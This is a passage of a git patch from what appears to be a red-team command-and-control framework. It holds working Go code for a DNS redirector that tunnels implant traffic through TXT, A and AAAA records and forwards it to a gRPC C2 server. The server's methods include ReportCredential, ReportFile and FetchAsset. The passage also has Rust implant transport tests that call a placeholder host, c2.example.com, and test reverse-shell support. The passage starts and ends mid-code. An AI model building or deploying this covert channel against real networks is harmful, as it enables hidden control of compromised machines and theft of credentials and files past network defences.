"chunks", len(conv.responseChunks), "crc_low", response[3]) + } else { + responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + response = []byte(responseStr) + } + + slog.Debug("response too large for record type, using multi-query chunking", + "conv_id", actualConvID, "packet_type", string(pktType), "data_size", len(responseData), + "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.responseChunks), + "indicator_size", len(response)) + + r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) + return + } + + success := r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) + + if success && pktType == typeEnd && !strings.HasPrefix(string(responseData), respChunked) { + r.conversations.Delete(convID) + slog.Debug("conversation completed and cleaned up", "conv_id", convID) + } +} + +// handleInitPacket processes init packet and creates conversation +// Init payload format: [method_code:2][total_chunks:5][crc:4] +func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, error) { + slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) + + // Payload: method(2) + chunks(5) + crc(4) = 11 chars + if len(data) < 11 { + slog.Debug("init payload too short", "expected", 11, "got", len(data)) + return nil, fmt.Errorf("init payload too short: expected 11, got %d", len(data)) + } + + methodCode := data[:2] + totalChunksStr := data[2:7] + crcStr := data[7:11] + + slog.Debug("parsing init payload", "method_code", methodCode, "chunks_str", totalChunksStr, "crc_str", crcStr) + + totalChunks, err := decodeSeq(totalChunksStr) + if err != nil { + return nil, fmt.Errorf("invalid total chunks: %w", err) + } + + // CRC is base36-encoded (4 chars) + expectedCRC, err := decodeBase36CRC(crcStr) + if err != nil { + return nil, fmt.Errorf("invalid CRC: %w", err) + } + + methodPath := codeToMethod(methodCode) + realConvID := generateConvID() + + conv := &Conversation{ + id: realConvID, + methodPath: methodPath, + totalChunks: totalChunks, + expectedCRC: uint16(expectedCRC), + chunks: make(map[int][]byte), + lastActivity: time.Now(), + } + + r.conversations.Store(realConvID, conv) + + slog.Debug("created conversation", "conv_id", realConvID, "method", methodPath, "total_chunks", totalChunks) + + return []byte(realConvID), nil +} + +// handleDataPacket stores a data chunk in the conversation +func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + // Ignore chunks beyond declared total (duplicates/retransmissions) + if seq >= conv.totalChunks { + slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.totalChunks) + return []byte{}, nil + } + + conv.chunks[seq] = data + + dataPreview := "" + if len(data) > 0 { + previewLen := min(len(data), 16) + dataPreview = fmt.Sprintf("%x", data[:previewLen]) + } + + slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.chunks), "expected_total", conv.totalChunks, "data_preview", dataPreview) + + return []byte{}, nil +} + +// handleEndPacket processes end packet and returns server response +func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.chunks)) + + // Check for missing chunks + var missing []int + for i := 0; i < conv.totalChunks; i++ { + if _, ok := conv.chunks[i]; !ok { + missing = append(missing, i) + } + } + + if len(missing) > 0 { + // Return missing chunks list + missingStrs := make([]string, len(missing)) + for i, seq := range missing { + missingStrs[i] = encodeSeq(seq) + } + response := fmt.Sprintf("%s%s", respMissing, strings.Join(missingStrs, ",")) + + slog.Debug("returning missing chunks", "conv_id", convID, "count", len(missing), "missing_seqs", missing) + + return []byte(response), nil + } + + // Reassemble data (chunks now contain raw binary, not base32) + requestData := r.reassembleChunks(conv.chunks, conv.totalChunks) + + // Sanity check: ensure we have exactly the right number of chunks + if len(conv.chunks) != conv.totalChunks { + slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.chunks), conv.totalChunks)), nil + } + + slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) + + // Verify CRC (chunks already contain raw decrypted data) + actualCRC := calculateCRC16(requestData) + expectedCRC := uint16(conv.expectedCRC) + + slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.chunks), "chunks_expected", conv.totalChunks) + + if actualCRC != expectedCRC { + errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) + slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + return []byte(respError + "invalid_crc"), nil + } + slog.Debug("reassembled and validated data", "conv_id", convID, "bytes", len(requestData)) + + // Forward to upstream gRPC server + responseData, err := r.forwardToUpstream(ctx, upstream, conv.methodPath, requestData) + if err != nil { + return nil, fmt.Errorf("failed to forward to upstream: %w", err) + } + + // Determine if we need to base32-encode the response + // For A/AAAA records that will use binary chunking, return raw binary + // For TXT records, return base32-encoded with "ok:" prefix + useBinaryChunking := (queryType == 1 || queryType == 28) // A or AAAA record + + if useBinaryChunking { + // Return raw binary data for A/AAAA records + // The main handler will chunk this if needed + return responseData, nil + } + + // For TXT records, use base32 encoding + encodedResponse := encodeBase32(responseData) + responseWithPrefix := respOK + encodedResponse + + if len(responseWithPrefix) > maxDNSResponseSize { + // Response too large - chunk it + slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) + + // Store response data in conversation + conv.responseData = responseData + conv.responseCRC = calculateCRC16(responseData) // Use full 16-bit CRC + + // Chunk the encoded response + conv.responseChunks = nil + for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { + end := i + maxResponseChunkSize + if end > len(encodedResponse) { + end = len(encodedResponse) + } + conv.responseChunks = append(conv.responseChunks, encodedResponse[i:end]) + } + + // Return chunked response indicator: "r:[num_chunks]:[crc]" + response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.responseChunks), "crc", conv.responseCRC) // Don't delete conversation yet - client will fetch chunks + return []byte(response), nil + } + + // Return success with response + // Note: Conversation will be deleted by the main handler after successful send + return []byte(responseWithPrefix), nil +} + +// handleFetchPacket serves a response chunk to the client +func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + // Check if this is the final fetch (cleanup request) + if chunkSeq >= len(conv.responseChunks) { + // Client is done fetching - clean up conversation + r.conversations.Delete(convID) + slog.Debug("conversation completed and cleaned up", "conv_id", convID) + return []byte(respOK), nil + } + + // Return the requested chunk + if chunkSeq < 0 || chunkSeq >= len(conv.responseChunks) { + return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.responseChunks)) + } + + chunk := conv.responseChunks[chunkSeq] + slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.isBinaryChunking) + + // For binary chunking (A/AAAA), return raw bytes + // For text chunking (TXT), return "ok:" prefix + base32 data + if conv.isBinaryChunking { + return []byte(chunk), nil + } + return []byte(respOK + chunk), nil +} + +// reassembleChunks combines chunks in order +func (r *Redirector) reassembleChunks(chunks map[int][]byte, totalChunks int) []byte { + var result []byte + for i := 0; i < totalChunks; i++ { + if chunk, ok := chunks[i]; ok { + slog.Debug("reassembling chunk", "seq", i, "chunk_len", len(chunk), "total_so_far", len(result)) + result = append(result, chunk...) + } else { + // This should never happen since we check for missing chunks first + slog.Error("CRITICAL: Missing chunk during reassembly", "seq", i, "total_chunks", totalChunks, "chunks_present", len(chunks)) + } + } + slog.Debug("reassembly complete", "final_len", len(result), "total_chunks", totalChunks) + return result +} + +// forwardToUpstream sends request to gRPC server and returns response +func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { + // Create gRPC stream + md := metadata.New(map[string]string{}) + ctx = metadata.NewOutgoingContext(ctx, md) + + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ + StreamName: methodPath, + ServerStreams: true, + ClientStreams: true, + }, methodPath, grpc.CallContentSubtype("raw")) + if err != nil { + return nil, fmt.Errorf("failed to create stream: %w", err) + } + + // Determine request/response streaming types + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + + if isClientStreaming { + // For client streaming, parse length-prefixed chunks and send individually + offset := 0 + chunkCount := 0 + for offset < len(requestData) { + if offset+4 > len(requestData) { + break + } + + // Read 4-byte length prefix + msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) + offset += 4 + + if offset+int(msgLen) > len(requestData) { + return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) + } + + // Send individual chunk + chunk := requestData[offset : offset+int(msgLen)] + if err := stream.SendMsg(chunk); err != nil { + return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) + } + + offset += int(msgLen) + chunkCount++ + } + + slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) + } else { + // For unary/server-streaming, send the request as-is + if err := stream.SendMsg(requestData); err != nil { + return nil, fmt.Errorf("failed to send message: %w", err) + } + } + + if err := stream.CloseSend(); err != nil { + return nil, fmt.Errorf("failed to close send: %w", err) + } + + // Receive response(s) + var responseData []byte + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + // Check if EOF (normal end of stream) + if stat, ok := status.FromError(err); ok { + if stat.Code() == codes.OK || stat.Code() == codes.Unavailable { + break + } + } + // For streaming responses, we may receive multiple messages + if err.Error() == "EOF" { + break + } + return nil, fmt.Errorf("failed to receive message: %w", err) + } + + // Append message data + if len(msg) > 0 { + if isServerStreaming { + // For server streaming, add 4-byte length prefix before each response chunk + lengthPrefix := make([]byte, 4) + binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) + responseData = append(responseData, lengthPrefix...) + responseData = append(responseData, msg...) + } else { + // For unary, just append the response as-is (no length prefix) + responseData = append(responseData, msg...) + } + responseCount++ + } + } + + slog.Debug("received responses", "method", methodPath, "count", responseCount, "total_bytes", len(responseData)) + + return responseData, nil +} + +// parseDomainName extracts the domain name from a DNS query +func (r *Redirector) parseDomainName(data []byte) (string, error) { + var labels []string + offset := 0 + + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + break + } + offset++ + + if offset+length > len(data) { + return "", fmt.Errorf("invalid label length") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + return strings.Join(labels, "."), nil +} + +// parseDomainNameAndType extracts both domain name and query type from DNS question +func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { + var labels []string + offset := 0 + + // Parse domain name + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + offset++ + break + } + offset++ + + if offset+length > len(data) { + return "", 0, fmt.Errorf("invalid label length") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + // Parse query type (2 bytes after domain name) + if offset+2 > len(data) { + return "", 0, fmt.Errorf("query too short for type field") + } + + queryType := binary.BigEndian.Uint16(data[offset : offset+2]) + domain := strings.Join(labels, ".") + + return domain, queryType, nil +} + +// sendDNSResponse sends a DNS response with the appropriate record type +// Returns true if response was sent successfully, false if it failed +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, data []byte, queryType uint16) bool { + response := make([]byte, 0, 512) + + // DNS Header + response = append(response, byte(transactionID>>8), byte(transactionID)) + response = append(response, 0x81, 0x80) // Flags: Response, no error + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, 0x00, 0x01) // Answers: 1 + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 + + // Question section (echo the question) + for _, label := range strings.Split(domain, ".") { + if len(label) == 0 { + continue + } + response = append(response, byte(len(label))) + response = append(response, []byte(label)...) + } + response = append(response, 0x00) // End of domain + response = append(response, 0x00, byte(queryType)) // Type: echo query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + + // Answer section + // Name (pointer to question) + response = append(response, 0xC0, 0x0C) + // Type: echo query type + response = append(response, 0x00, byte(queryType)) + // Class: IN + response = append(response, 0x00, byte(dnsClassIN)) + // TTL: 60 seconds + response = append(response, 0x00, 0x00, 0x00, 0x3C) + + // Build RDATA based on query type + var rdata []byte + + switch queryType { + case txtRecordType: + // TXT record: split data into 255-byte chunks + txtData := data + var txtChunks [][]byte + for len(txtData) > 0 { + chunkSize := len(txtData) + if chunkSize > 255 { + chunkSize = 255 + } + txtChunks = append(txtChunks, txtData[:chunkSize]) + txtData = txtData[chunkSize:] + } + + // If no data, add an empty TXT string + if len(txtChunks) == 0 { + txtChunks = append(txtChunks, []byte{}) + } + + // Build TXT RDATA + for _, chunk := range txtChunks { + rdata = append(rdata, byte(len(chunk))) + rdata = append(rdata, chunk...) + } + + case 1: // A record (4 bytes capacity) + // Pad to 4 bytes (data already validated to fit) + rdata = make([]byte, 4) + copy(rdata, data) + + case 28: // AAAA record (16 bytes capacity) + // Pad to 16 bytes (data already validated to fit) + rdata = make([]byte, 16) + copy(rdata, data) + + default: + // Unsupported record type, fallback to TXT + slog.Warn("unsupported query type, using TXT", "query_type", queryType) + rdata = []byte{byte(len(data))} + rdata = append(rdata, data...) + } + + // RDLENGTH + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + // RDATA + response = append(response, rdata...) + + // Send response + _, err := conn.WriteToUDP(response, addr) + if err != nil { + slog.Error("failed to send DNS response", "error", err) + return false + } + return true +} + +// sendErrorResponse sends a DNS error response +func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { + response := make([]byte, dnsHeaderSize) + binary.BigEndian.PutUint16(response[0:2], transactionID) + response[2] = 0x81 + response[3] = 0x83 // RCODE: Name Error + + conn.WriteToUDP(response, addr) +} + +// generateConvID generates a random conversation ID +func generateConvID() string { + const chars = "0123456789abcdefghijklmnopqrstuvwxyz" + b := make([]byte, convIDSize) + for i := range b { + b[i] = chars[rand.Intn(len(chars))] + } + return string(b) +} + +// codeToMethod maps 2-character method code to gRPC path +// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, +// +// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput +func codeToMethod(code string) string { + methods := map[string]string{ + "ct": "/c2.C2/ClaimTasks", + "fa": "/c2.C2/FetchAsset", + "rc": "/c2.C2/ReportCredential", + "rf": "/c2.C2/ReportFile", + "rp": "/c2.C2/ReportProcessList", + "rt": "/c2.C2/ReportTaskOutput", + } + + if path, ok := methods[code]; ok { + return path + } + + return "/c2.C2/ClaimTasks" +} + +// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) +func encodeSeq(seq int) string { + const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" + digit4 := (seq / 1679616) % 36 // 36^4 + digit3 := (seq / 46656) % 36 // 36^3 + digit2 := (seq / 1296) % 36 // 36^2 + digit1 := (seq / 36) % 36 // 36^1 + digit0 := seq % 36 // 36^0 + return string([]byte{base36[digit4], base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +} + +// decodeSeq decodes 5-character base36 sequence number +func decodeSeq(encoded string) (int, error) { + if len(encoded) != 5 { + return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + } + + val := func(c byte) (int, error) { + switch { + case c >= '0' && c <= '9': + return int(c - '0'), nil + case c >= 'a' && c <= 'z': + return int(c-'a') + 10, nil + default: + return 0, fmt.Errorf("invalid base36 character: %c", c) + } + } + + d4, _ := val(encoded[0]) + d3, _ := val(encoded[1]) + d2, _ := val(encoded[2]) + d1, _ := val(encoded[3]) + d0, err := val(encoded[4]) + if err != nil { + return 0, err + } + + return d4*1679616 + d3*46656 + d2*1296 + d1*36 + d0, nil +} + +// encodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) +// Used only for init packet payload and chunked response metadata +func encodeBase36CRC(crc int) string { + const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" + digit3 := (crc / 46656) % 36 // 36^3 + digit2 := (crc / 1296) % 36 // 36^2 + digit1 := (crc / 36) % 36 // 36^1 + digit0 := crc % 36 // 36^0 + return string([]byte{base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +} + +// decodeBase36CRC decodes 4-character base36 CRC value +func decodeBase36CRC(encoded string) (int, error) { + if len(encoded) != 4 { + return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) + } + + val := func(c byte) (int, error) { + switch { + case c >= '0' && c <= '9': + return int(c - '0'), nil + case c >= 'a' && c <= 'z': + return int(c-'a') + 10, nil + default: + return 0, fmt.Errorf("invalid base36 character: %c", c) + } + } + + d3, _ := val(encoded[0]) + d2, _ := val(encoded[1]) + d1, _ := val(encoded[2]) + d0, err := val(encoded[3]) + if err != nil { + return 0, err + } + + return d3*46656 + d2*1296 + d1*36 + d0, nil +} + +// calculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +func calculateCRC16(data []byte) uint16 { + var crc uint16 = 0xFFFF + for _, b := range data { + crc ^= uint16(b) << 8 + for i := 0; i < 8; i++ { + if (crc & 0x8000) != 0 { + crc = (crc << 1) ^ 0x1021 + } else { + crc <<= 1 + } + } + } + return crc +} + +// encodeBase32 encodes data to lowercase base32 without padding +func encodeBase32(data []byte) string { + if len(data) == 0 { + return "" + } + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + return strings.ToLower(encoded) +} + +// decodeBase32 decodes lowercase base32 data without padding +func decodeBase32(encoded string) ([]byte, error) { + if len(encoded) == 0 { + return []byte{}, nil + } + encoded = strings.ToUpper(encoded) + return base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(encoded) +} From 237da971d4fc98bc019094469ff03a63c55c3657 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 01:24:37 -0600 Subject: [PATCH 02/17] Add unit tests --- implants/lib/transport/src/dns.rs | 217 +++++++++++++ tavern/app.go | 2 +- tavern/internal/redirectors/dns/dns.go | 326 +++++++++---------- tavern/internal/redirectors/dns/dns_test.go | 337 ++++++++++++++++++++ 4 files changed, 711 insertions(+), 171 deletions(-) create mode 100644 tavern/internal/redirectors/dns/dns_test.go diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 12cd3570f..cf40bcda9 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1408,3 +1408,220 @@ impl Transport for DNS { )) } } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_dns_init_defaults() { + let dns = DNS::init(); + + assert!(dns.dns_server.is_none()); + assert!(dns.base_domain.is_empty()); + assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); + assert_eq!(dns.current_record_type, TXT_RECORD_TYPE); + assert!(dns.enable_fallback); + } + + #[test] + fn test_dns_new_parses_callback() { + // Test with specific DNS server + let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); + assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); + assert_eq!(dns.base_domain, "c2.example.com"); + assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); + assert!(dns.enable_fallback); + + // Test with system resolver (*) + let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); + assert!(dns.dns_server.is_none()); + assert_eq!(dns.base_domain, "c2.example.com"); + + // Test with A record type preference and fallback disabled + let dns = DNS::new( + "dns://*/c2.example.com?type=A&fallback=false".to_string(), + None, + ) + .unwrap(); + assert_eq!(dns.preferred_record_type, A_RECORD_TYPE); + assert_eq!(dns.current_record_type, A_RECORD_TYPE); + assert!(!dns.enable_fallback); + } + + #[test] + fn test_dns_new_invalid_type_errors() { + let result = DNS::new("dns://8.8.8.8/c2.example.com?type=BOGUS".to_string(), None); + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("type") || err_msg.contains("BOGUS")); + } + + #[test] + fn test_calculate_max_data_size_positive() { + let dns = DNS { + dns_server: None, + base_domain: "c2.example.com".to_string(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + }; + + let max_size = dns.calculate_max_data_size(); + assert!(max_size > 0, "max data size should be positive"); + + // Test with a very long base domain - should be smaller + let dns_long = DNS { + dns_server: None, + base_domain: "very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" + .to_string(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + }; + + let max_size_long = dns_long.calculate_max_data_size(); + assert!(max_size_long > 0, "long domain max size should be positive"); + assert!( + max_size_long < max_size, + "longer domain should reduce available data size" + ); + } + + #[test] + fn test_generate_conv_id_length() { + let id = DNS::generate_conv_id(); + assert_eq!(id.len(), CONV_ID_SIZE); + + // Verify all characters are base32 lowercase (a-z0-7) + for c in id.chars() { + assert!( + c.is_ascii_lowercase() || c.is_ascii_digit(), + "conv_id should contain only lowercase alphanumeric chars" + ); + } + } + + #[test] + fn test_encode_decode_seq() { + // Test round-trip encoding/decoding + let test_values = vec![0, 1, 42, 1234, 60466175]; // Max is 36^5 - 1 + + for val in test_values { + let encoded = DNS::encode_seq(val); + assert_eq!(encoded.len(), SEQ_SIZE); + + let decoded = DNS::decode_seq(&encoded).unwrap(); + assert_eq!(decoded, val, "seq {} should round-trip correctly", val); + } + } + + #[test] + fn test_encode_decode_base36_crc() { + // Test round-trip encoding/decoding + let test_crcs = vec![0, 1, 255, 12345, 65535]; // 16-bit values + + for crc in test_crcs { + let encoded = DNS::encode_base36_crc(crc as u16); + assert_eq!(encoded.len(), 4); + + let decoded = DNS::decode_base36_crc(&encoded).unwrap(); + assert_eq!( + decoded, crc as u16, + "CRC {} should round-trip correctly", + crc + ); + } + } + + #[test] + fn test_calculate_crc16() { + // Test with known data + let data1 = b"hello world"; + let crc1 = DNS::calculate_crc16(data1); + assert!(crc1 > 0, "CRC should be non-zero for non-empty data"); + + // Same data should produce same CRC + let crc1_again = DNS::calculate_crc16(data1); + assert_eq!(crc1, crc1_again, "CRC should be deterministic"); + + // Different data should produce different CRC (highly likely) + let data2 = b"hello world!"; + let crc2 = DNS::calculate_crc16(data2); + assert_ne!(crc1, crc2, "different data should produce different CRC"); + } + + #[tokio::test] + async fn test_handle_response_ok_prefix() { + // Create a mock DNS instance + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + // Simple test data + let test_data = b"test response data"; + let encoded_data = DNS::encode_base32(test_data); + let response = format!("{}{}", RESP_OK, encoded_data); + + // Call handle_response with empty chunks (no retries needed) + let conv_id = "test12345678"; + let chunks: Vec> = vec![]; + + let result = dns + .handle_response(conv_id, response.as_bytes(), &chunks, 0) + .await; + + assert!(result.is_ok()); + let decoded = result.unwrap(); + assert_eq!(decoded, test_data); + } + + #[tokio::test] + async fn test_handle_response_error_prefix() { + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + let response = b"e:something_broke"; + let conv_id = "test12345678"; + let chunks: Vec> = vec![]; + + let result = dns.handle_response(conv_id, response, &chunks, 0).await; + + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("something_broke") || err_msg.contains("error")); + } + + #[tokio::test] + async fn test_handle_response_missing_prefix() { + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + // Missing chunks response - should trigger retry or error + let response = b"m:00000,00001,00002"; + let conv_id = "test12345678"; + let chunks: Vec> = vec![b"chunk0".to_vec(), b"chunk1".to_vec()]; + + // With retry_count at max, this should error out + let result = dns.handle_response(conv_id, response, &chunks, 5).await; + + // Should either error or handle the missing chunks + // Since we're at max retries, it should error + assert!(result.is_err()); + } + + #[tokio::test] + async fn test_reverse_shell_not_supported() { + let mut dns = DNS::init(); + + let (_tx, rx) = tokio::sync::mpsc::channel(1); + let (resp_tx, _resp_rx) = tokio::sync::mpsc::channel(1); + + let result = dns.reverse_shell(rx, resp_tx).await; + + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); + } +} diff --git a/tavern/app.go b/tavern/app.go index 24edec60d..c12f0ff38 100644 --- a/tavern/app.go +++ b/tavern/app.go @@ -39,9 +39,9 @@ import ( "realm.pub/tavern/internal/www" "realm.pub/tavern/tomes" + _ "realm.pub/tavern/internal/redirectors/dns" _ "realm.pub/tavern/internal/redirectors/grpc" _ "realm.pub/tavern/internal/redirectors/http1" - _ "realm.pub/tavern/internal/redirectors/dns" ) func init() { diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 563bf2d7a..804c750b6 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -25,14 +25,16 @@ const ( dnsHeaderSize = 12 // Standard DNS header size maxLabelLength = 63 // Maximum bytes in a DNS label txtRecordType = 16 // TXT record QTYPE + aRecordType = 1 // A record QTYPE + aaaaRecordType = 28 // AAAA record QTYPE dnsClassIN = 1 // Internet class defaultUDPPort = "53" convTimeout = 15 * time.Minute // Conversation expiration // Protocol field sizes (base36 encoding) - typeSize = 1 // Packet type: i/d/e/f - seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks - convIDSize = 12 // Conversation ID length + typeSize = 1 // Packet type: i/d/e/f + seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks + convIDSize = 12 // Conversation ID length headerSize = typeSize + seqSize + convIDSize // Packet types @@ -69,25 +71,53 @@ type Redirector struct { baseDomains []string // Accepted base domains for queries } +// GetConversation retrieves a conversation by ID (for testing) +func (r *Redirector) GetConversation(convID string) (*Conversation, bool) { + val, ok := r.conversations.Load(convID) + if !ok { + return nil, false + } + return val.(*Conversation), true +} + +// StoreConversation stores a conversation (for testing) +func (r *Redirector) StoreConversation(convID string, conv *Conversation) { + r.conversations.Store(convID, conv) +} + +// CleanupConversationsOnce runs cleanup logic once (for testing) +func (r *Redirector) CleanupConversationsOnce(timeout time.Duration) { + now := time.Now() + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > timeout { + r.conversations.Delete(key) + } + conv.mu.Unlock() + return true + }) +} + // Conversation tracks state for a request-response exchange type Conversation struct { mu sync.Mutex - id string - methodPath string // gRPC method path - totalChunks int // Expected number of request chunks - expectedCRC uint16 // CRC16 of complete request data - chunks map[int][]byte // Received request chunks - lastActivity time.Time + ID string // Exported for testing + MethodPath string // gRPC method path (exported for testing) + TotalChunks int // Expected number of request chunks (exported for testing) + ExpectedCRC uint16 // CRC16 of complete request data (exported for testing) + Chunks map[int][]byte // Received request chunks (exported for testing) + LastActivity time.Time // Exported for testing // Response chunking (for large responses) - responseData []byte - responseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) - responseCRC uint16 - isBinaryChunking bool // true for A/AAAA, false for TXT + ResponseData []byte // Exported for testing + ResponseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) (exported for testing) + ResponseCRC uint16 // Exported for testing + IsBinaryChunking bool // true for A/AAAA, false for TXT (exported for testing) } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { - listenAddr, domains, err := parseListenAddr(listenOn) + listenAddr, domains, err := ParseListenAddr(listenOn) if err != nil { return fmt.Errorf("failed to parse listen address: %w", err) } @@ -135,9 +165,9 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } } -// parseListenAddr extracts address and domain parameters from listenOn string +// ParseListenAddr extracts address and domain parameters from listenOn string // Format: "addr:port?domain=example.com&domain=other.com" -func parseListenAddr(listenOn string) (string, []string, error) { +func ParseListenAddr(listenOn string) (string, []string, error) { parts := strings.SplitN(listenOn, "?", 2) addr := parts[0] @@ -186,9 +216,9 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { r.conversations.Range(func(key, value interface{}) bool { conv := value.(*Conversation) conv.mu.Lock() - if now.Sub(conv.lastActivity) > convTimeout { + if now.Sub(conv.LastActivity) > convTimeout { r.conversations.Delete(key) - slog.Debug("conversation expired", "conv_id", conv.id) + slog.Debug("conversation expired", "conv_id", conv.ID) } conv.mu.Unlock() return true @@ -287,13 +317,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr var responseData []byte switch pktType { case typeInit: - responseData, err = r.handleInitPacket(convID, string(data)) + responseData, err = r.HandleInitPacket(convID, string(data)) case typeData: - responseData, err = r.handleDataPacket(convID, seq, data) + responseData, err = r.HandleDataPacket(convID, seq, data) case typeEnd: - responseData, err = r.handleEndPacket(ctx, upstream, convID, seq, queryType) + responseData, err = 